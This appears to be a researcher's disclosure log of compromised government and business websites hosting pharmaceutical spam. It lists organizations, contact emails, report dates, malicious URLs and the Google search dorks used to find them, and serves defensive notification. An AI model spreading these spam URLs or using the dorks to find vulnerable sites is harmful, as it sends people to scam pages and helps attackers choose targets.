Hit 10. www.bainesdesign.co.uk | info@bainesdesign.co.uk hello@barleyhousegroup.co.uk Informed 12-1-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0CIYBEBYwCg&url=http%3A%2F%2Fwww.bainesdesign.co.uk%2F%3Fp%3Dbuy-arimidex%26k%3D5&ei=KpqbUvb6LofooASFjYGoAw&usg=AFQjCNEYQD_mcQ8rfHm4V2z1Uy0Yr6qnWA&sig2=5oDKCKKgEsK5_ZUaLwRxvQ&bvm=bv.57155469,d.cGU |
Hit 14. cafemomentum.org Restaurant in Dallas, TX | jef@tingleycomm.com chad@cafemomentum.org Informed 12-1-13 | http://cafemomentum.org/products/buyarimidex/ |
Hit 20. kingamplification.com Guitar store in CA | val@kingamplification.com Informed 12-1-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CIcBEBYwCTgK&url=http%3A%2F%2Fkingamplification.com%2Farimidex.html&ei=PaKbUrKTKI7roAT0kYDYBw&usg=AFQjCNFUQIlb--0VoKgKXsusVsfjpqGBOQ&sig2=prWvmOykCCSfC0ksfpBjTg&bvm=bv.57155469,d.cGU |
Mustafa Al-Bassam (@musalbas): Why is the U.S. government running an online Canadian Viagra store? chambersburgpa.gov/oldwebsite/
Bill Schnift (@BillSchnift): @musalbas @sambowne loves this stuff.
Indeed I do!
Organization | Emails | Malicious URL |
---|---|---|
Hits for "inurl:.gov intitle:viagra" | | |
Hit 3. www.winchester-in.gov City of Winchester, Indiana | druss@egovstrategies.com mayor@winchester-in.gov Reported on 12-12-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CEUQFjAC&url=http%3A%2F%2Fbuy-viagra.winchester-in.gov%2F937.html&ei=WwWqUqSpO4XdoASlyILYDQ&usg=AFQjCNGTNFay1K9j6b7W9uI3HqhZ_pSQIQ&sig2=Aq9hfsg6_DwPIowI2IL4HQ&bvm=bv.57967247,d.cGU Only visible from Google link |
Hit 5. www.gsnmagazine.com Government Security News | jgoodwin@gsnmagazine.com mccabe@gsnmagazine.com Reported on 12-12-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CFMQFjAE&url=http%3A%2F%2Fwww.gsnmagazine.com%2Fnode%2F28233%3Fz3nub%3D414895&ei=WwWqUqSpO4XdoASlyILYDQ&usg=AFQjCNGC21DO-QJCwCECr0p9hiCnqK4AkA&sig2=l71g5B7a2Jzbb6EjaLwv1w&bvm=bv.57967247,d.cGU |
Hits for "inurl:.gov intitle:viagra" (Region: US) | | |
Hit 11. rivnet.com Riviera Telephone Co., Texas | rtc.ofc@rivnet.com rtc@rivnet.com Reported on 12-12-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0CDYQFjAAOAo&url=http%3A%2F%2Frivnet.com%2Ffiles%2Fgov-uk-buy-viagra.html&ei=jQyqUteDFI3voATV1YEI&usg=AFQjCNFLOrW37ODZoFuG3Upsrcbp38DkYw&sig2=Q64ynabmgfQj_kcQNtZHng&bvm=bv.57967247,d.cGU |
Hit 13. www.s-5.com Roofing company in Colorado | info@s-5solutions.com info@30dps.com Reported on 12-12-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0CEYQFjACOAo&url=http%3A%2F%2Fwww.s-5.com%2Fscm%2Fscm%2Fwestminster-gov-uk-viagra%2F&ei=jQyqUteDFI3voATV1YEI&usg=AFQjCNFYstWR-jxhLGG__fAGOPwjcnJswA&sig2=UhmmzrF23qIqnR9flmvAWw&bvm=bv.57967247,d.cGU |
Hit 17. www.wmuseumaa.org Westmoreland Museum, PA | info@wmuseumaa.org membership@wmuseumaa.org Reported on 12-12-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0CGYQFjAGOAo&url=http%3A%2F%2Fwww.wmuseumaa.org%2Frfq%2Fwestminster-gov-uk-viagra%2F&ei=jQyqUteDFI3voATV1YEI&usg=AFQjCNH08xGofrj02rLKbF9IkLdQAh6h6Q&sig2=FY1z4oNR7GqcbEF9vTHv_g&bvm=bv.57967247,d.cGU |
Hit 30. www.jamescitycountyva.gov James City County VA | County.Administration@jamescitycountyva.gov jccnews@jamescitycountyva.gov Reported on 12-12-13 | http://www.jamescitycountyva.gov/online-viagra/ |
Hit 44. www.intgovforum.org Internet Governance Forum | igf@unog.ch Reported on 12-12-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=34&ved=0CEMQFjADOB4&url=http%3A%2F%2Fwww.intgovforum.org%2Fcms%2Fdynamic-coalitions%2F72-ibr%3Faw50z%3D270581&ei=3g-qUr-4LNPdoAS5hID4DA&usg=AFQjCNG-CKzx7BiMANwYbjCY1Z3PrVmfWQ&sig2=k2i9iFMcwfgJfY2nPgm4iA&bvm=bv.57967247,d.cGU |
Hit 57. chambersburgpa.gov | jwright@chambersburgpa.gov plagiovane@chambersburgpolice.com boroadmin@chambersburgpa.gov Reported on 12-12-13 | http://www.chambersburgpa.gov/oldwebsite/ |
Hit 71. fabius-ny.gov Town of Fabius N.Y | webmaster@fabius-ny.gov townclerk@fabius-ny.gov Reported on 12-12-13 | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=62&ved=0CDIQFjABODw&url=http%3A%2F%2Fbuy-viagra.fabius-ny.gov%2F71.html&ei=BBKqUsvAIcP1oASjxIDoDQ&usg=AFQjCNFY_LNW_o_XwssjGWxPGA6YS2zzFQ&sig2=OAlm2-pKTZKBrTMgSzNYjQ&bvm=bv.57967247,d.cGU |